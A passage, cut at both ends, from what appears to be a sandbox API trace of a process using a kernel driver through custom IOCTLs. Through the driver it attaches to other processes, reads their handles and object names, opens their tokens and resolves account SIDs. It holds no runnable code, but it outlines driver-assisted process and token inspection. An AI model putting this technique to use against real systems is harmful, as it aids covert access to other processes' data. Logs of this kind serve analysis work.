Process=0xfffff880052b3558) returned 0x0 [0225.838] PsAcquireProcessExitSynchronization () returned 0x0 [0225.838] KeStackAttachProcess (in: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880052b35d0) [0225.838] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020648d0, HandleInformation=0x0) returned 0x0 [0225.838] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.838] PsReleaseProcessExitSynchronization () returned 0x2 [0225.838] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x12 [0225.838] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.838] ObfDereferenceObject (Object=0xfffffa80020648d0) returned 0x1 [0225.838] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.839] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.839] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.839] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0225.839] PsLookupProcessByProcessId (in: ProcessId=0x788, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.839] PsAcquireProcessExitSynchronization () returned 0x0 [0225.839] KeStackAttachProcess (in: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880052b35d0) [0225.839] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002064a20, HandleInformation=0x0) returned 0x0 [0225.839] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.839] PsReleaseProcessExitSynchronization () returned 0x2 [0225.839] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x12 [0225.839] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.839] ObfDereferenceObject (Object=0xfffffa8002064a20) returned 0x1 [0225.839] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.839] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.839] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.840] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.840] PsLookupProcessByProcessId (in: ProcessId=0x788, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.840] PsAcquireProcessExitSynchronization () returned 0x0 [0225.840] KeStackAttachProcess (in: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880052b35d0) [0225.840] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.840] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.840] PsReleaseProcessExitSynchronization () returned 0x2 [0225.840] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x12 [0225.840] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.840] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.840] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.840] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x484) returned 0xc8 [0225.840] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.840] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800206e920, HandleInformation=0x0) returned 0x0 [0225.840] ObOpenObjectByPointer (in: Object=0xfffffa800206e920, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.840] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x14 [0225.840] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.840] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.840] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.841] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.841] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.843] CloseHandle (hObject=0xc4) returned 1 [0225.843] CloseHandle (hObject=0xc8) returned 1 [0225.843] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.843] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.843] PsLookupProcessByProcessId (in: ProcessId=0x484, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.843] PsAcquireProcessExitSynchronization () returned 0x0 [0225.843] KeStackAttachProcess (in: PROCESS=0xfffffa800206e920, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800206e920, ApcState=0xfffff880052b35d0) [0225.843] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800206dcb0, HandleInformation=0x0) returned 0x0 [0225.843] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.843] PsReleaseProcessExitSynchronization () returned 0x2 [0225.843] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x12 [0225.843] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.843] ObfDereferenceObject (Object=0xfffffa800206dcb0) returned 0x1 [0225.843] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.843] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.843] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.844] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0225.844] PsLookupProcessByProcessId (in: ProcessId=0x484, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.844] PsAcquireProcessExitSynchronization () returned 0x0 [0225.844] KeStackAttachProcess (in: PROCESS=0xfffffa800206e920, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800206e920, ApcState=0xfffff880052b35d0) [0225.844] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800206d8c0, HandleInformation=0x0) returned 0x0 [0225.844] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.844] PsReleaseProcessExitSynchronization () returned 0x2 [0225.844] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x12 [0225.844] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.844] ObfDereferenceObject (Object=0xfffffa800206d8c0) returned 0x1 [0225.844] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.844] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.844] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.844] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.844] PsLookupProcessByProcessId (in: ProcessId=0x484, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.844] PsAcquireProcessExitSynchronization () returned 0x0 [0225.844] KeStackAttachProcess (in: PROCESS=0xfffffa800206e920, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800206e920, ApcState=0xfffff880052b35d0) [0225.844] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.844] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.844] PsReleaseProcessExitSynchronization () returned 0x2 [0225.844] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x12 [0225.844] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.845] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.845] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.845] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x138) returned 0xc8 [0225.845] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.845] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f23b30, HandleInformation=0x0) returned 0x0 [0225.845] ObOpenObjectByPointer (in: Object=0xfffffa8001f23b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.845] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x14 [0225.845] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.845] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.845] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.845] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.845] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.847] CloseHandle (hObject=0xc4) returned 1 [0225.848] CloseHandle (hObject=0xc8) returned 1 [0225.848] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.848] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.848] PsLookupProcessByProcessId (in: ProcessId=0x138, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.848] PsAcquireProcessExitSynchronization () returned 0x0 [0225.848] KeStackAttachProcess (in: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880052b35d0) [0225.848] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f61650, HandleInformation=0x0) returned 0x0 [0225.848] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.848] PsReleaseProcessExitSynchronization () returned 0x2 [0225.848] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x12 [0225.848] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.848] ObfDereferenceObject (Object=0xfffffa8001f61650) returned 0x1 [0225.848] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.848] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.848] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.848] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0225.849] PsLookupProcessByProcessId (in: ProcessId=0x138, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.849] PsAcquireProcessExitSynchronization () returned 0x0 [0225.849] KeStackAttachProcess (in: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880052b35d0) [0225.849] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f61850, HandleInformation=0x0) returned 0x0 [0225.849] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.849] PsReleaseProcessExitSynchronization () returned 0x2 [0225.849] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x12 [0225.849] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.849] ObfDereferenceObject (Object=0xfffffa8001f61850) returned 0x1 [0225.849] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.849] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.849] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.849] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.849] PsLookupProcessByProcessId (in: ProcessId=0x138, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.849] PsAcquireProcessExitSynchronization () returned 0x0 [0225.849] KeStackAttachProcess (in: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880052b35d0) [0225.849] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.849] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.849] PsReleaseProcessExitSynchronization () returned 0x2 [0225.849] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x12 [0225.849] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.850] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.850] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.850] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x79c) returned 0xc8 [0225.850] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.850] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f73350, HandleInformation=0x0) returned 0x0 [0225.850] ObOpenObjectByPointer (in: Object=0xfffffa8001f73350, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.850] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x14 [0225.850] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.850] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.850] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.850] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.850] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.146] CloseHandle (hObject=0xc4) returned 1 [0226.146] CloseHandle (hObject=0xc8) returned 1 [0226.146] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.146] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.146] PsLookupProcessByProcessId (in: ProcessId=0x79c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.147] PsAcquireProcessExitSynchronization () returned 0x0 [0226.147] KeStackAttachProcess (in: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880052b35d0) [0226.147] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f9af20, HandleInformation=0x0) returned 0x0 [0226.147] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.147] PsReleaseProcessExitSynchronization () returned 0x2 [0226.147] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x12 [0226.147] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.147] ObfDereferenceObject (Object=0xfffffa8001f9af20) returned 0x1 [0226.147] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.147] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.147] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.147] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0226.147] PsLookupProcessByProcessId (in: ProcessId=0x79c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.147] PsAcquireProcessExitSynchronization () returned 0x0 [0226.147] KeStackAttachProcess (in: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880052b35d0) [0226.147] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f73b50, HandleInformation=0x0) returned 0x0 [0226.147] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.147] PsReleaseProcessExitSynchronization () returned 0x2 [0226.147] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x12 [0226.147] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.147] ObfDereferenceObject (Object=0xfffffa8001f73b50) returned 0x1 [0226.148] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.148] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.148] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.148] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.148] PsLookupProcessByProcessId (in: ProcessId=0x79c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.148] PsAcquireProcessExitSynchronization () returned 0x0 [0226.148] KeStackAttachProcess (in: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880052b35d0) [0226.148] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.148] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.148] PsReleaseProcessExitSynchronization () returned 0x2 [0226.148] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x12 [0226.148] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.148] ObfDereferenceObject 